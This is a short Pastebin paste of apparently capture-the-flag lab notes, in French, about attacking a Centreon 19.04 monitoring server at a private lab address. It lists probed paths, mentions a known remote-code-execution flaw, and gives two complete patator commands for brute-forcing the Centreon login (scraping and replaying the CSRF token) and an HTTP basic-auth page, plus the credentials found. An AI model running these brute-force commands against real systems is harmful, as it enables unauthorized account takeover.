Advertisement
zigzagSecurity

Untitled

Nov 22nd, 2019
437
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.92 KB | None | 0 0
  1. /monitoring -> bypass par changement de method http
  2. /centreon
  3. /server-status -> access refused
  4. aa.php
  5. panel.php
  6.  
  7.  
  8. centreon v 19.04 avec rce
  9.  
  10.  
  11. brute force avec contournement csrf:
  12.  
  13. patator http_fuzz --threads=10 url="http://10.10.10.157/centreon/index.php" method=POST body='useralias=FILE0&password=FILE1&submitLogin=Connect&centreon_token=_CSRF_' header="Cookie: PHPSESSID=${SESSIONID}" 0=user.txt 1=UserPass follow=0 accept_cookie=1 before_urls="http://10.10.10.157/centreon/index.php" before_header="Cookie: PHPSESSID=${SESSIONID}" before_egrep='_CSRF_:name="centreon_token" type="hidden" value="(\w+)" />' -x ignore:fgrep="Your credentials are incorrect."
  14.  
  15. credz found :
  16.  
  17. admin:passwd
  18. admin:!@#$%^
  19. monitoring:passwd
  20. monitoring:!@#$%^
  21.  
  22.  
  23. brute force authent basic :
  24.  
  25. patator http_fuzz auth_type=basic url=http://10.10.10.157/monitoring user_pass=FILE0:FILE1 0=./UserPass 1=./UserPass -x ignore:code=401 -t 15
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement